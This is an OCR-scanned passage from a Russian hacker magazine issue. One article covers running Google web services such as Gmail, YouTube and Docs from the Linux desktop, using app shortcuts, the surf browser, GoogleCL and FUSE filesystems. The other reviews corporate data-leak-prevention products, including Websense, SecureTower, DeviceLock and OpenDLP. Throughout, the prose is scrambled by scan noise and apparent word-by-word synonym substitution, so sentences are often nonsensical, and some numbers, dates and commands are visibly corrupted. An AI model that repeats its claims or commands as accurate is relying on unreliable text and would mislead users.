идеи живут равно дажевнекотором смысле про­

Например, известный

Google

Chгome

ранее давным-давно имеет во своем составе прибор

userna.me@gm;;~Ц_ . !;от;/. dас/t:tовая_папка

GoogleCL,

статочно выявить надлежащий веб-сайт, переключиться

Во срок первого обращения для сервису симпатия

ярлыки приложений ... >>, избрать поляна раз­

на параграф << Меню

предназначенном чтобы

работы из такими сервисами Гугла, как бы Bloggeг,

попросит подключить Gооglе-логин [адрес почты

<<Календарь>>, <<Контакты>>

получи и распишись

[Gmaill, Google Docs,

превращения веб-сайтов во приложения . До­

$ google youtube post --category \ Comedy yжoc.avi

Конечно же, не велено бросать да что до контроль­

ном скрипте

вместе с wеЬ- т ехноло г иями приложенийl, же его цвета полуют .

0. gтls<iir

браузера. Проект безбедно загнулся

[а нашел л да т оч н ее, переро из закачаешься фре йм во в рассуждении р ко в целях

$ gcp -f pdf \

$

приложений бросьте потеть над чем во Сети , а поль­ зователь сможет поселять их сверху рабочем

"Список покуnок"

Gmaill да откроет страничк у на спринклер ре,

Picasa равно YouTube [только дополнение видео!.

бери которой должен п по отношению дтвердить карт-бланш

Мы сейчас писали об этой утилите на одном изо про­

Goog leCL

шлых номеров, баян ому моя персона неграмотный буду возобновляться

следующих запусках сервиса ничто знакомить

равным образом без затей приведу серия примеров ее ис­

равным образом объяснять малограмотный н у жно.

получи и распишись удаленное у правление. При по­

-7

Инструменты

-7

Создать

мещения ярлыка [рабочий княжение и/или меню приложенийl, и- вуаля!- нате рабочем столе появится ярлык, до клику держи котором

во обособленном окне откроется сайт без ненужных обвесок во виде кадастр браузера

равным образом строк ввода/поиска . То а самое, причем даже изо командной строки, дозволено произвести

пользования.

равно не без; приложениями, установленными не без; по­

мощью Chгome

Публикация п ос та на благе со через

0.

Bloggeг:

Мы нашли массу приложений , способных

Web Stoгe [по клику правой

кнопкой мыши!:

подменять безвыгодный постоянно спокойный веб-интерфейс

$ google. b.lagger с c:ti tJ.e 'Я в сЦ :.. 'Oткpt>UJ

рщt --Ьlog

'Linuxoid' \ Googlech l ' .--:tags ' linux, \ ДllЯ . ceбя _Google(:~, . \ .

...... Ы.а. с!:>lа, ..1;11а .: . Добавление перипетии во календарь:

0.

сер висов. Но зачем коли пользу кого какого-то экзо­

$ chromium --app=http : //gmail.com

тического веб-сайта до этих пор далеко не разработано нужного приложения иначе говоря существующие нам

Достаточно мыслящий начальник

неграмотный приглянулись [как вариант, понравился

окон сохраняет местоположение равно размеры окна

нормальный веб-интерфейсl ? В этом случае

накануне закрытием равным образом восстанавливает его

позволяется приложить технологию

Desktop web

appl i catioп, которая обеспечивает включение

бери прежнем месте около следующем запуске.

Функция веб-приложения вкушать равным образом во браузере Fiгefox. Здесь всё до сего поры не задавайся : хватает пере­

> youtube

vieыer

>

lnsert an YouTube Ul!l or search somethi ng .•. linux

0 2 3 4 5

-

Б -

0 В -

0 18 11 12 13 14 15 16 17 18 19 28

-

UberStudent 0/eview - liпux Distro 0/evieloJS lby lnflnitely6alactic ) ( 01 :58) Ubuntu 01 . 08 0/eview- linux Distro 0/evieloJS lby lnfinitelyGalactic) 013 : 02) How То Baclc:up Your Frugal Puppy Using Puppy linux lby icyos ) 083 : 06) Creating а DeЬian AIIM JМG for Archos - linux - Part 0 l by metalx1BBВJ ( 08 :56) linux Mint 02 0/evieы- linux Distro 0/evieloJS lby JnfinitelyGalact i cJ 012:41> linux is Better Тhan llindoloJS lby loclc:ergnome) ! B5:BBJ linux lby llhatYouDughtтoKnow) 084:32) linux Mint 02 0/evieы 0 LA5 0 s19eBB l by jupiterbroadcasting J 055 :49) Js Desktop linux Dead? 0 LAS 0 s19e84 lby jupiterbroadcasting ) 081:18 : 08! linux Opti11ization lby Jockergnome) 085:35) openSUSE 02 . 0 0/evieы 0 Тhе linux Action Sho"'! lby jupiterbroadcasting) (55:52) Pinguy OS 01 . 01! 0/evie"'- linux Oistro 0/evieloJS lby lnfinitelyGalacticJ 018 :44) llindoыs is Better Тhan linux lby loclc:ergnore) 084 :87) Fedora 05 0/evie"'- linux Oistro 0/evieыs l by InfinitelyGalactic) 019:17> Мessages from the linux Cшmunity lby ТhelinuxFoundationJ !85:B3 J linux Mint Cinnai!IOfl Desl<top early lool< Jan 08th 0812 lby linux4UnМe) 087 :56) Тhе Не"' Нui\Ьer One Distro? - linux Mint 02 lby gotЬletuJ 088 :1!3) IIIHOOIIS VISТA AEI/0 VS LIHUX UBUHТU BEI/Yl l by tearbd2J 084 :33 ) An lntro to linux Part 0: llhat is linux? !Тhis lleel< ln linuxJ !Ьу th i sыeelc:inlinux) 083:26) Fedora 06 0/eview- Linux Distro 0/evieыs (Ьу lnfinitelyGalactic) (87:57)

волочить favicoп сайта нате работоспособный стол, равным образом ярлык появится сам по себе собой.

Зто впрямь приспособленный путь созда­ ния веб-приложений возьми рабочем столе, же он не лишен некоторых недостатков. В частности, лично меня здорово напрягает, что-нибудь присовокупление

хорошенького понемножку нести записки и заботы перед управлением возьми хоть да лишен­ ного элементов управления, хотя полноценного

веб-браузера не без; плагинами, расширениями и по всем статьям остальным совершенноненужным

во данном случае балластом, какой-никакой только лишь сжирает парамнезия равно процессори малограмотный слабит

дерьмовый пользы. Позтому моя особа рекомендовал

бы эксплуатнуть с целью подобных задач более легкие решения, ко примеру минималистичный браузер suгf. Браузер suгf основан сверху движке

WebKit,

малограмотный имеет интерфейса да управляется не без; помощью клавиатурных комбинаций . Это самый легко­ весный равно стремительный с всех браузеров, основан­

Youtube-viewer- консольный скрипт с целью просмотра роликов не без; YouTube

012

ных бери полноценном НТМL-движке, а в силу того что некто

ХАКЕР

03/158/2 01 0


Д остуча ть ся д что до н ебес

Sup- Мutt-подобный

давальщик на

Gmail

без упрека годится к запуска приложений.

(наnример , на поисках интересн по отношению г в рассуждении видео

Самый безыскусственный вид его запуска выглядит

в

таково :

(например , чтобы управления п касательно чт ой ! да ис­

YouTubel,

созидать равно предотвращать файлы

пользоват ь р азнообразные пер ен аправления ввода-в ы во касательно да. Для тех но серв исо во Гугла

$ surf http:)/gmail.com

существ у е т ч етыре таких вирт уал ьных фай­ ловьlх от равно сте м ы для основе

во него всего только узенькую полоску загрузки,

FUSE: Yout ubeFS, GDataFS, Gm aiiFS, Google Docs FS (ес ть еще goofs, а сие полузаброшен н ая Jаvа­

На экране появится интерфейс

Gmail

во аб­

солютно голом да чистом виде. Браузер добавит

# vi /etc/gmailfs/gmailfs.conf [account] username=usernamegmail.com password=параль [filesystem] linux_fs_4 fsname

которая отобразится во нижней части окна.

вещь l. Та кж е на Сети можн что до н айти f lickгfs ,

Чтобы предложить нужные размер окна мгновенно

предна з н ач енн у ю пользу кого загруз ки изоб ражений

в миг запуска, дозволительно ухватиться

возьми flickг.co m равно MetaWeЫogFS. С ее объединение мощью

у тилитой wmctгl:

можн насчёт п ости ть на блоги неуклонно с комок андной

[logs] l evel=INFO logfile=- / gmailfs.log Затем н у жно примонтировать файловую систему:

строки .

Крат для что до пройдемся объединение по всем статьям фа й ловым

#!/Ьin/sh

surf http://gmail.com wmctrl -r surf -е ·e,se,se,4ee,зee· С крипт откроет

Gmail

размер окна равным

во окне suгf, сделает

000 х 000

да разместит

его во левом верхнем углу, вместе с отступом

00 направо

равным образом сверху. С через среды рабочего стола

системам равным образом попробуем подвергнуть анализу вместе с я, ко а для равно х

использовать. Итак, Youtube FS !code .goog le. com/p/youtubefs/1 - файловая си ст ема пользу кого до­ ст у жете для YouTube. Этой системы недостает на большин­

$ ./gma ilfs.py

allow_root

поnе

\

/ колея /до/каталога

Теперь перейдем ко Google Docs FS (code. google .com/p/google-docs-fs/1 . Эта файловая

стве дистриб у тивов, при всем том интересах ее у лагерь об на для да

построение предоставляет дорога ко документам

хватает из мотать не без; сайта тарболл да распако­

Google Docs.

вать его . Пользоваться так:

в качестве кого равно весь другие ФС на нашем обзоре:

$ ./youtubefs .py \

$ gmount

Использовать ее этак но просто,

скрипт легко и просто обернуть во метка равным образом вселить

бери рабочем столе .

/ nуть / предварительно /ка талог а

\

/ стезя / прежде /каталога

П осле сего на указанном каталоге появят­

После сего на катало г е появятся подката­ логи равно файлы на в точности таком но виде, на каком

Иногда удобнее малограмотный эксплуатнуть специаль­

ся до этого времени плей-листы равным образом каналы, в которые

ные клиенты, а компоновать веб-сервисы

ть1 подписан . В каталогах твоя милость найдешь самочки

они представлены в сайте

на виде бездействие файловой системы, идеже позволяется

видеозаписи. Аналогичной функционально­

Документы дозволяется копировать, перемещать,

стью обладает

конкатенировать равно удалять. Для отключения исполь­

бродяжничать из через файлового менеджера

net l,

GOataFS

( gdatafs . souгcefoгge .

которую допускается раскопать на репазитариях

docs.google.com.

з уем команду gumouпt:

дистрибутивов. Синтаксис ее вызова не­

$ gumount

насколько иной:

GOOGLEAUTH

$ gdatafs

l:i§l:lei!C!I

\

/путь)до/каталога

/ маршрут / прежде /к аталога

Веб-сервисы от п особны подменить только который не

параль

что бы ни настольное приложение. Их неграмотный нужно Недавно

Google

изменил технология

Файловая построение

GmaiiFS

( sг71 . net/

характеризовать да обновлять. Они позволяют

аутентификации сторонних приложений,

pгojects/gmailfs /1 предназначена для того монти­

безвыгодный беспокои ть ся касательно сохранности данных равным образом на­

того ради каждой программы lскрипта),

рования почтового ящика

строек . Однако самовольно интерфейс веб-сервиса

ет получи основе протокола

может безграмотный приблизиться некоторым пользователям

работающей не без; аккаунтом

Google, nридется

Gmail. Она работа­ IMAP, вследствие чего преддверие

построить индивидуальный nа амплуа . Для сего заходим

ее использованием придется сделать составляющий частью его

alias быть чересчур тяжеловесным либо

для страницу

https://www.goog le.com/set-

поддержку во настройках сервиса (Настрой­

назойливым. В этом случае удобнее об­

tings, засим

выбираем оnцию << Авторизация

ки~ Пересылка равным образом

ратиться для специализированным клиентам

IMAPI.

nараль равно задаем небывалый nараль из nомощью

конфиг

сnециальной комплекция на конце страницы.

содержания :

03/158/2012

~Включить

После сего делать нечего разработать

nриложений да сайтов ~Изменить», вводим

ХАКЕР

POP/IMAP

/etc/gmailfs/gmailfs.conf

следующего

равно файловым системам, которые, в духе твоя милость смог убеди ть ся, на достаточном количес тв е имеют­ ся нате просторах Сети . :::И:

013


SYN/ACK

Сернуля « gгindeг » Яремчук lgгindeгlё!synack.гul

БОРЬБА С УТЕЧКАМИ КОРПОРАТИВНОЙ ИНФОРМАЦИИ

-

Важныйэтап в развертывании

DLP

-внедрение, при случае

В современном мире одним с ключевых экономических ресурсов является

информация. Кто ей владеет, оный довольно кто наделен успех, на так а срок рассеяние данных практически денно и нощно означает потерю клиентов, а в таком случае равным образом фиаско компании . Именно

следственно ноне беспричинно велодрын барыш для DLР-решениям, позволяющим показывать и предотвращать передачу конфиденциальной информации. Выбор большой, лидеры еще неграмотный сформировались, а предложения то и дело схожи сообразно функциям, же отличаются логикой работы да заложенными принципами, оттого выработаться безграмотный приближенно просто.

никуда не денешься четко сформулировать требования и ожидания

равно «Обесnечить »

DLP

-

всеми данными в целях

контроля .

Репозиторий

на

Ubuntu MyDLP- <tow_n_-

~111.edгatecb .

иm.lц!шn.tu .

ХАКЕР

03/158/2012

.


В поисках равно н балка д шутник

КАК ВЫБРАТЬ

DLP?

Информационная надёжность стала одной с структура л яющих дея­

тельности какой угодно компании, а соответствующие риски влияют получи ее рейтинг да смазливость для того инвесторо на . П касательно ста т истике, во е ­ роя т ность прибыль конфиде н циальной информа ц ии с подачи дейст во ий

сотрудника организации [и н ущелье д ера] превы ш ает вероят н восток ь уте ч ­ ки во результате взлома, притом сие безграмотный обяза т ельно умышленные действия, абонент может ненамеренно отпра на ить обложка малограмотный тому адресату. Д что касается появления интернета осуществлять контроль деятельнос т ь

ОШИБКА В РАБОТЕ

DLP

МОЖЕТ

ПРИВЕСТИ К БЛОКИРОВКЕ ВПОЛНЕ ЛЕГАЛЬНОГО ТРАФИКА И ПОМЕШАТЬ РАБОТЕ СОТРУДНИКОВ

сотрудников было чуть было не невозможно. Н ет, установить контроль, конечно, было реал ь но, хотя технических средс т во для автоматизации насчет ц есса никак не су щ ествовало. Сейчас всё изме н илось.

ражения равно т. п.]. Хорошие системы, как бы правило, используют до этого времени

Деловая переписка подобает сообразно электронной почте, пользователи

доступные технологии , а ведущий может несомненно формировать

общаются с помощью

устав единовластно получай основе подготовленных шаблонов .

lM

равным образом

VoiP,

обмениваются файлами, ведут

блоги, публикуют сведения на сацсетях равно т. д. Все сии каналы

Кроме того, DLР-система должна оснащать службу безопасно­

подумаешь осматривать автоматически, производительность современных

сти инструментом с целью анализа всех событий да архивом переданной

серверов равно цистерна носителей позволяют скликать да обрабаты на ать

информации. Еще одним критерием, определяющим сортировка

факты во реальном времени. Ч тобы обнаружит ь равно пре д отврати т ь

является способ противодействовать утечку дан н ых на реальном вре­

передачу конфиденциальных данных возьми разных каста п ахти [при пере­ меще нии, использовании да хранении ] , применяется единый сословие

мени. Однако специалисты различно относятся ко этой функции,

систем защиты-

особенно получай этапе ввода во эка не без; плуатацию] может вогнать ко бло­

DLP [Data Leak

Ргеvепtiоп] . На ноне суще­

все же грех на работе

DLP,

DLP [а ложные срабатывания случаются,

ствует покамест от десяток терминов-синонимов для того таких сис т ем:

кировке тотально легального трафика, а значит, воспрепятствовать работе со­

[lпfoгmatioп

трудников . Поэтому многие администраторы предпочитают испытание

ILDP Leak Detectioп & Pгeveпtion], IPC [lnfoгmation Pгotection and Contгol], ILP [lпfoгmatioп Leak Ргеvепtiоп] равно др . Задача у них,

соответственно факту, а далеко не блокировку.

на общем-то, простая - мониторинг, равным образом д ентификация да ограда .

Официальных стандартов, относительно п ре д еляющих, кой д олжна взяться

DLP,

WEBSENSE DATA SECURITY SUITE

нонче невыгодный существует, посему разработчики nо-разному смо т рят

Са й т проекта :

держи функции

Лицензия:проприетарная .

DLP.

Часто позволяется столкнуться самые неравные реали­

websense.com .

зации, никак не во всякое время включающие впрямь необходимое или,

ОС вместе с ервер :

наоборот, напичканные ненужным функционалом, добавлен н ым

ОС клиенты: Windows Vista , 0, 0003, 0008/R2.

за заказу компании. Однако со временем определились некотор ы е

Русифи для ация: отсутствует.

требования, которыми следует быть носителем полнофункциональное

Windows Server 0003 R2 .

Калифорнийская альянс

Websense

важно известна на правах

DLР-решение. В первую очередность они касаются д иапазона возмож­

разработчик систем филырации веб-трафика, во частности,

ных каналов утечки:

на

электронная корреспонденция

[SMTP, РОРЗ, IMAP];

Facebook

незадолго короче внедрена ее эксплуатация с целью защиты подле

переходе в области внешним ссылкам. Решения ориентированы на первую

программы обмена IМ/Vо iР -сообщениями равно Р2Р-клиенты; веб-ресурсы [социаль н ые се т и, форумы, бло г и], а вдобавок пере ­

караван нате сре д ние равно круnные компании со штатом с лишним

000

сотрудников равным образом государственные учреждения. Комплекс Webseпse

после ностро контроля основных каналов обмена д анными позволя­

доза файлов в соответствии с протоколам НТТ Р, НТТ РS равно FТР ;

DSS

сетевая знак [SM В P гinting, NCP Pгintiпg , LPD, равно т. д . ]; внешние устройства [USB, CD/DVD, принтеры, Bluetooth, модемы и т. п . ], сетевые папки .

ет на реальном времени остановить утечку конфиденциальной ин­ формации . Он работает нате основе технологии цифровых отпечатков PгeciseiD, разработанной компанией PoгtAuthority которую

Websense

купила на

0006

году .

PreciseiD

Technologies,

обеспечивает вы­

сокую ясность обнаружения конфиденциальных данных равно неграмотный име­

Характер п ередаваемых ей-ей нн ых определяетс пишущий эти строки чрез обнару­

жения специфических признаков [метки, хе ш- фи н кции, грифы ] и анализа контента [статистический анализ, регулярные зарабатывать

ет некоторых недостатков лингвис т ических методов . Д анные опи­ сываются близ помощи « цифрового отпечатка >>, представляющего

~.:._:=~ -~ ~-~-'"'-w ~~.--------,IЬ"',..=.-= ..:::~=·=-·- - - - - - - - - J ....

·-. --

0dl c.-c~

lii $~--

'""'""""!''!IIIIICI!I=a=ВI!!Iii!!IC=---~~==~

~~

.......

___

:IJ"ICO:u'lq~Yypts

---~ __.... • 0 • IG • \2 • 0 • • • '

~-~

'11"~... .._

,) 12 • 0 • • • '

• 0 • 'IO • Il

...... '!~"

__ .._

~~,._

--

к..---

в-

--

--

е

_

-----------

____

~~~-r,.",

.

-

! в.:-

.-

.

01Ь!88!-=- • 0rь.-.

ее

• - Р--а - з.--

Н аст армия ка разреше н равным образом й на

ХАКЕР

03/158/2012

DeviceLock Endpoint DLP Suite

Установл е нны й

DeviceLock DLP от одра жит шеренга

го ведь во ых n рав осадок

015


SYN/ACK

WEBSENSE DSS ОПРЕДЕЛЯЕТ РЕАКЦИЮ НА ИНЦИДЕНТ ЛИБО ТРЕБУЕТ ПОДТВЕРЖДЕНИЯ ОТ ОТВЕТСТВЕННОГОСОТРУДНИКА

Websense Web 0ecuгity Gatewayl. П оддерживается соединение · с Act ive Diгectoгy, Novell eDiгectoгy равно Lotus Domino. Совместно с Websense 055 используется шеренга других приложений, рас ш иряю­ щих внутренние резервы колтун пл екса DLP: Data Еndроiпt-устанавливается держи конечные П К, идеже контро ­ лирует данные, передаваемые чрез U5B равно присутствие печати, попытки сделать скриншоты экрана, сведения lM равно т. д . ; Data Мопitог - осуществляет наблюдение каналов передачи, · чтобы относительно п ределить, кто, куда, в качестве кого равно что-нибудь через пр авляет, да сопостави ть с политиками равно бизнес-процессами, снижая риски;

Data Ргоtесt-включает Data Мопitо г, автома т ически блокирует собой пакет символов либо слов документа иначе говоря со д ержимо го полей

утечку данных получи и распишись основе политик;

БД. Такой по мнению д шествие обеспечивает точную классификацию контента

Data Discoveг- содержание пользу кого поиска да классификации конфи­

паче нежели про 000 форматов вплоть до кументов (включая та блицы СУБ Д

денциальныхданных, которую допускается истощить как бы во составе

да сжа твоя милость е файлы ! , ага но коли материал перенесены тож конвертиро­

055, в такой мере да отдельно, невыгодный требуетустановки агентов.

ваны на прочий формат. Кроме PгeciseiD, используются иные алго­ ритмы : словари, точное равно частичное совпадение, статистический

Для управления всеми решениями Websense используется

разбирание да т. д. Вместе не без; тем интересах анализа информации на продуктах

единая облигация Websense TRITON Coпsole (Java равным образом Apache Tomcatl.

Websense nрименяется сколько-нибудь технологий Deep Content Сопtгоl

Websense 055 адски без затей устано свивать . В картотека еще входит М5 0QL 5ег v ег Expгess 0008 R2, а в целях больших сред скорее ис п ользовать

да T hгeat5eekeг (сканирова н ие веб-сайтов равным образом установление новых угроз).

полную версию. Первоначальная регулирование политический деятель производит­

П роизводится наблюдение основ н ых каналов передачи: элек­

тро нн ой почты (5М ТР ), сообще ний М5 Exchange, НТТР/НТТР5, FТР, IM/M5N . П редусмотрена объединение до ICAP со любым да нт ернет­

ся возле помощи просто-напросто г по отношению мастера, создающего шаблоны не без; учетом страны да харак т скандалист деятельности организации, во фолиант числе имеют­

ся да региональные настройки с целью России .

шлюзом, поддерживающим сие т п ро т окол. Для мони т оринга сервер

FALCONGAZE SECURETOWER

Websense может наступать на просвет либо — либо использовать зеркалирование трафика (5PANI. Websense 055 ав т оматически определяет реакцию получи и распишись инци­

Лицензия:nроnриетарная.

дент либо требует подтверж д ения ото что касается тв етственно г насчёт сотрудника.

ОС сервер:

Система умеет помешать передачу конфиденциальных данных,

ОС клиенты:

заниматься известие !специалисту службы безопасности,

Русификация: есть.

Сайт nроекта:

начальнику alias владельцу контентаl, швырять внешнюю про­

falconqaze.ru .

Windows 0003/2008lx86/x64). Windows XP/Vista/7/2003/2008lx86/x64).

Относительно молодое решение, разраба тыв аемое россий­

грамму, отправлят ь задание н а п од тв ерж д ение отправки равным образом др.

ским 000 «Фальконгейз>> . П редставляе т с лица программный

Система присваивает ан ц иде нт у у никальны й пункт равно прикрепля­

продукт, использующий ради поиска конфи д енциальной инфор­

ет ко сообщению файл. Администратор задает г ибкие политики

мации технологии контентного, а три бутив н ого равно ста ти из т ическо­

вместе с учетом дело -проц ессов килоом п ании, а во комплекте поставки сейчас

го анализа (ключевые слова, регулярные выражения, оттиск

перевода нет малость д еся т заговор шаблонов да н астроенных отчетов

равным образом т. д.) . Обеспечивает надзор всех популярных каналов прибыль

за инцидентам равно активности п ользовате л ей. Продукты Websense

данных, на фолиант числе что касается т слеживает ради ш ифрова нны й движение

отдельных сотрудников либо групп, защищают корпоративную

(НТТР/5, FТР/5, РОРЗ/5, 0МТР/5, IMAP, 05CAR, ММР, M5N, XMPP I Если во организации используется М5 Exchange 0007/2010, так весь

документацию ото внесения несанкционированных изменений.

внутренняя да внешняя переписка в свою очередь проверяется получи и распишись соот­

Остальные внутренние резервы включают п ринудительное шифровка

ветствие политикам. Особо не терпится сделать акцент полную поддерж­

позволяют подрезать крылья посещение для опре д еленным сведениям в целях

электронной п оч твоя милость (ч ерез шлюз! равным образом совместную работу вместе с други­

ку 0kype, опять-таки 0есuгеТоwег может схватывать голосовой

ми продуктами Websense (напр имер, со шлюзом безопасности

трафик, текстовые сообщения, файлы равно отправляемые 0М5.

ВОЗМОЖНОСТИ

OPENDLP

Проект OpenDLP lc ode.google .com/p/

помощи SSL !используется libcuгl) . Настройку

(nолучать опись файлов, во которых найдены

~1 предлагает объединение инструментов

большого числа агентов упрощают профил и,

совпадения) да обслуживать работой агентов

чтобы nредотвращения возможных утечек

содержащие распорядок сканирования.

!пауза сканированияидеинсталляция

информации вместе с клиентских машин,

В устав х интересах описания объектов поиска

агента) . В текущей версии безграмотный производится

работающи х перед управлением Windows . Для сего в подчиненных комnах

используются Регl -со вместимые регулярные

проелушивание сетевого трафика, а вот и все

выражения , позволяющие определять

испытание информации, копируемой в наружный

устанавливается незначительный агент.

н об степень кредиток равным образом паспортов ,

Само строительство производится

пароли, раскрывать наличествование получи и распишись ресурса х

документы на текстовом формате, хранящиеся

на автоматическом режиме вследствие Netblos/SMB .

документов не без; конфиденциальными данными

получи жестком диске кусок батман . Проект на срок

Кроме того, если угодно прямое развертка

равным образом изучать их обработку получи и распишись внешних

находится на стадии активной разработки .

систем безо установки агентов на

Windows !через SMB), *niх-системах ISSH) да СУБД IMS SQL равным образом MySQL). Централизованное господство

сервисах IGoogle Docs , Gmail) . Администратор

Первая модифицирование лещадь номером

может настроить черноволосый равным образом пребелый меню

во апреле 0010-го, текущая версия-

каталогов для того сканирования да вынуть душу

Серверная делянка написана получи и распишись языке Регl , интересах

осуществляется близ помощи веб - интерфейса,

отслеживаемые расширения файлов .

установки разработчики рекомендуют

размен данными вместе с агентом производится

В сегодняшнее эпоха интерфейс позволяет

равно

согласно каналу связи, зашифрованному быть

просматривать результаты сканирования

016

SSN ,

диск , схема проверяет исключительно

0.1

представлена

0.4.3 .

Apache Linux, к х ранения данных используется MySQL. Агент написан для языке Си. Исходные

ХАКЕР

03/158/2012


В поисках инсайдера

р

• "--R- м.. - ..,.. _ · -

~~~~~~--------------=~~ lti!Ar. ......

~

• .__w.._........,."...._......,.....,.._..,......,.,.r...,__.._._.._• ._,._w.,_.._.._ ... ___ ....,.

что до --

- ·-

.

М! Dq!t!aR "' !:t_. "'D ,em

fQ ~

0Z!SIПa

wш~·

-..-.

_.,_._.......,.., _ _

...-~

rQ ~Scnll

0]iO.J5

_",_.._,

I!Xm!Ncr!SIOWdnмA'ft•l

0tJ ~

$acll

d4J'S

~.,.,._._.,.._,...1....

0[) ~

0о1:С

~

~.,*~,._

~$tp!trdeмi'И1

~==::

~

'4 ~$atlt

WtteqsJEJrtd;IQattr«di!

ro ~

~

r{J ,....... ~

IQ!StqyyD9!\'Ьrdцr+1

--=. . _. "'~

~ '""""*-1

r/J ~

.S0i1t

:::

s.r.

...us

Scr1>l

0835

=::~=-==..:= О.С.. .................. . _

_ . , ....... ......., ..... Н-

031815

_"'._..,. ........... ~ ~., . . . . . - - - - . . . . :к...

~

_ _ ., ............... >d.-

==::

....

r/J ............... ...._ t,Q .......,. --~

t.JI0]5

- < t i - S 0 ........... 0.~

0.J80J5

~--.и--

riJ ~ ....,.е._

dD35

":J ~

~

&.us

~

lt} ........... _ . ,

018)5

_.,s.-.8r~~

~

~~ ~

08И

~"!~~~~

....... -1~---

ИQmAgpiJ!tyrlwм'tJ•ppt

Шаблоны

~"'-'

0IIQ.ta

wн.rurnмt!Qnмtю!aJ

............ .......... """''"' .......

•-

~

АФ!оr•м•и•n

NA«n " F«f·''"A

..""*"•

0cпJrnltetcт....twu-nl,.......'i'nч•

~

:g:::

rD"""""*'"" - . - . . . !/J """"*-1 ._...е.-

гггг ~ · J

~ ~

В по части

____

~-

·-·

~ Sllld . . ........, ................... _~ ........... ..... s

~ --

~ ............ ~.-.......... -

~-- ... .u.a!8

• 01111D

____ .. _..,_

... ",. ..... . , . - . . . ..... ..,.__

~ .... - - - -

...

~ ~ l"'::ler.............. ..._., ~."..

,."

c-.-e::IIO.. " - • ""'--_..., ...........-..

-

..... c.-oм-a: ... ......,JJ L-Qoo81:0'8_.._ . . . . . .

=--........- . . .

-..:..,_ ... ...".а-м-. -----~-t.al

::::::~:::::.=.-.:.

-fii...-И168it_.........._ _ " ,..u...,..._..~ -r~-- IIIIW>•-

.

_.,s...a,~~

гггггг- ,.-

Выбор nолитики на рента

Websense DSS

Не по сию пору DLP сие умеют либо — либо обеспечивают на полном объеме !чащ е ус тановленный представитель контролирует едва текстовые сообщения].

J ...... _ ,..__. ..... a.

Websense Data Security Suite

ния ужас пр ос т , интересах управления , создания правил равно анализа

испо льз уется консо ль администратора

Falcongaze SecuгeToweг Falcongaze SecuгeToweг

Перехват трафика может составлять настроен выборочно: по части IР­

Admiп Coпsole равным образом консо ль безопасности

адресам иначе диапазонам, МАС-адресам, п ортам равным образом протоколам,

Clie nt.

логинам, размеру файлов равно т. д. Система распознает защи­

щенные жете роле м документы MS Woгd/Excel, PDF да отдельные люди

правил , позволяющих выразить отправку ряда данных !номеров кредиток, ИН Н ], выезд соц от етей, отправку вывод для того по­

типы архивов. Когда юзер отправляет документация не ведь — не то

иска новой работы равно др .

В усишко тановленной системе по-черному небольшую толику общих

архив, непроницаемый жете вал ем, симпатия генерирует случай равно предо­ ста вляет администратору полную информацию равным образом копию файла.

DEVICELOCK ENDPO INT DLP

SUIТE

SecuгeTo weг контролирует показатели , копируемые держи внешние

Сайт nроекта:

усище тройства , шрифт в локальных да сетевых принтера х. Чтобы

Лиценэия:nроnриетарная .

избежать ошибки подле опре делении отправителя, SecuгeToweг, кроме общепринятой информации, секс уче нной изо домена ,

ОС сервер: Windows NT/2000/XP/2003/Vista/2008/7. ОС клиенты: Windows NT/2000/XP/Vista/7.

анализирует весь контактные данные, IР-адрес равно эпоха его

Русификация: ест~

использования, логин во различных месседжерах равно т. п. Дал ее

devicelock.com/ru .

Система

DLP, построенная Oevicelock, которое

бери основе впредь до со таточно известного

налаженность заводи т переанальные карто чки , из через которых

решения

все собранная исходны данные привязывается для учетным записям

сту танцевальный шаг пользователей ко различным периферийным устройствам.

!возможна слияние из Active Diгe ctoгy ].

Device loc k разрешает/блокирует подступ из учетом следующих

Кроме того , SecuгeToweг имеет функции, отнюдь не специфичные в целях

DLP,

а до боли востребованные во большинстве организаций. Та к,

из ее через дозволено удостоверять работу сотрудников- си ­ стема эпизодически делает скрины эко ранов в целях детское место ую щ е го

просмотра во х ронологическом поряд ке, по части т слеживае т внутренние

используется в целях контроля до­

параметров: логина, типа, времени суток , формата файлов и т. д . Сейчас сие ключевой элеме нт системы

DLP,

инкорпорированный

об пциональным равным образом модулями Netwoгklock !анализ данных , пере­ дава емых соответственно волокуша ] да Coпtentlock !собственно, отвечает вслед за ана­ лиз равным образом филырацию данных]. Благодаря новым возможностям научился блоки ровать усище тройства , отслеживая на книга

да внешние контакты. При этом формируются наглядные интерак­

Deviceloc k

тивные отчеты, объединение зволяющие на дина мике приглядывать вслед сетевыми

числе да со д ержимое коп ируемы х данных , а безграмотный лишь логин

соб ытиями да активностью отдельных пользователей. На основе со­

п ольз ователя равно накипь стандартные норма . При этом раз­

светильник нны х данны х весть совсем нечего делать обнаружить , насколько времени сотрудни для

ные политики пасть навливаются во зависимости с того, работает

потра тил бери безделка общение, прен ебрегая своими служебными

кусок пьютер во мережа тож автономно !оперативный равным образом автономный режимы]. Система досконально протоколирует до сей времени поступки поль­

обяза нн остями, да от случая к случаю сие имело место. Функционально SecuгeToweг состоит с нескольких компонентов:

зова телей да осуществляет выборочное теневое снятие копии

се рв ер перехвата трафика- захватывает тенетный пробка

данных в целях анализа . Она распо з нает сильнее

равным образом пер е правда ет его во баз у данны х про х ранения !наибо лее требова­

равно использует порядком механизмов анализа контента: разведка

тельны й для ресурсам компонент];

за ключе ваша сестра м словам да шаблонам , во томище числе вместе с поддержкой

00

типов файлов

сервер контроля рабочих станций- используется про развер­

регулярных выражений !номера кредиток, адреса, паспортные

тывания агентов нате рабочие руки станции, мониторинга их работы

документация да т. д . ], словари, развертка по мнению свойствам файлов да данных

да сбора информации, п ерех вач енной агентами lв книжка числе шиф ­

!название, размер , шаг роль, молитва равным образом др.]. Благодаря этому DLP

рованного трафика равно данны х касательно работе вместе с внешними устройствами];

может разыскать текст, сп рятанный, например, на графических фай ­

сервер обработки информации-выполняетобработку, индекса­ цию да разложение данны х, розыск , отправкууведомлений, формирова­

лах . Реализованы белые списки !списки устройств равным образом протоколов и временные списки], позволяющие пользователю кроме проблем

ние отчетов равным образом пр .

п олучи ть вплоть до вместе с туп. Возможна слияние со ме ха низмами шиф­ рования Bitlockeг То

В качестве СУБД может фигурировать использован Огасlе,

SQLite

MS SQL

Sегvег,

да PostgгeSQL. Система легко и просто масштабируется, подле

Go, PGP,

ТгuеСгурt равно некоторыми другими .

Таким образом, дозволительно не позволить вписывать определенные док уме нты только лишь сверху защищенные носители . Клиентская пай

необходимости во силок позволено вплоть до бавит ь н овый сервер, отвечаю­

как и контролирует ягодицы обмена , PгintScгeeп , штамп докумен­

щий из-за перехват другими словами обработку данных. Пр оцесс развертыва-

